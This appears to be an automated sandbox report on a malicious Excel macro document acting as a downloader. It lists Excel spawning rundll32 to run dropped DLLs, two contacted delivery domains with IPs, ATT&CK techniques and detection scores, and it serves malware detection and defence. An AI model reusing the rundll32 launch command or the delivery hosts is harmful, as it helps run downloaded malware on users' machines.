    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: statistic-2069354685.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: statistic-2069354685.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: statistic-2069354685.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: statistic-2069354685.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: statistic-2069354685.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: statistic-2069354685.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: rundll32.exe, 00000001.00000002.693946993.0000000004A60000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.687678451.00000000048D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000001.00000002.693946993.0000000004A60000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.687678451.00000000048D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000001.00000002.693946993.0000000004A60000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.687678451.00000000048D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000001.00000002.693946993.0000000004A60000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.687678451.00000000048D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    statistic-2069354685.xlsm7%VirustotalBrowse
    statistic-2069354685.xlsm21%MetadefenderBrowse
    statistic-2069354685.xlsm34%ReversingLabsDocument-Office.Downloader.EncDoc

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    anaheimdermatologists.com3%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    anaheimdermatologists.com
    192.185.5.2
    truefalseunknown
    industrialarttextile.com
    192.254.233.89
    truefalse
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
        high
        https://login.microsoftonline.com/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
          high
          https://shell.suite.office.com:1443FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
            high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
              high
              https://autodiscover-s.outlook.com/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                  high
                  https://cdn.entity.FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://api.addins.omex.office.net/appinfo/queryFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                    high
                    https://clients.config.office.net/user/v1.0/tenantassociationkeyFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                      high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                        high
                        https://powerlift.acompli.netFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://lookup.onenote.com/lookup/geolocation/v1FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                          high
                          https://cortana.aiFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                            high
                            https://cloudfiles.onenote.com/upload.aspxFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                              high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                high
                                https://entitlement.diagnosticssdf.office.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                  high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                    high
                                    https://api.aadrm.com/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                      high
                                      https://api.microsoftstream.com/api/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                        high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                          high
                                          https://cr.office.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                            high
                                            https://portal.office.com/account/?ref=ClientMeControlFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                              high
                                              https://ecs.office.com/config/v2/OfficeFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                high
                                                https://graph.ppe.windows.netFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                  high
                                                  https://res.getmicrosoftkey.com/api/redemptioneventsFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://powerlift-frontdesk.acompli.netFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/workFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                      high
                                                      https://store.office.cn/addinstemplateFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                          high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                            high
                                                            https://store.officeppe.com/addinstemplateFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://dev0-api.acompli.net/autodetectFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.odwebp.svc.msFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://api.powerbi.com/v1.0/myorg/groupsFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                              high
                                                              https://web.microsoftstream.com/video/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                high
                                                                https://graph.windows.netFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                  high
                                                                  https://dataservice.o365filtering.com/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://officesetup.getmicrosoftkey.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://analysis.windows.net/powerbi/apiFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                    high
                                                                    https://prod-global-autodetect.acompli.net/autodetectFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://outlook.office365.com/autodiscover/autodiscover.jsonFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                      high
                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                        high
                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                          high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                            high
                                                                            https://ncus.contentsync.FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                              high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                high
                                                                                http://weather.service.msn.com/data.aspxFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                  high
                                                                                  https://apis.live.net/v5.0/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                    high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                      high
                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                        high
                                                                                        https://management.azure.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                          high
                                                                                          https://wus2.contentsync.FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://incidents.diagnostics.office.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/iosFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                              high
                                                                                              http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4jordji.nbvt11.0.drfalse
                                                                                                high
                                                                                                https://insertmedia.bing.office.net/odc/insertmediaFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                  high
                                                                                                  https://o365auditrealtimeingestion.manage.office.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                    high
                                                                                                    https://outlook.office365.com/api/v1.0/me/ActivitiesFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                      high
                                                                                                      https://api.office.netFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                        high
                                                                                                        https://incidents.diagnosticssdf.office.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                          high
                                                                                                          https://asgsmsproxyapi.azurewebsites.net/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://clients.config.office.net/user/v1.0/android/policiesFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                            high
                                                                                                            https://entitlement.diagnostics.office.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                              high
                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office.com/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocationFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                    high
                                                                                                                    https://templatelogging.office.com/client/logFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                      high
                                                                                                                      https://outlook.office365.com/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                        high
                                                                                                                        https://webshell.suite.office.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                          high
                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                            high
                                                                                                                            https://management.azure.com/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                              high
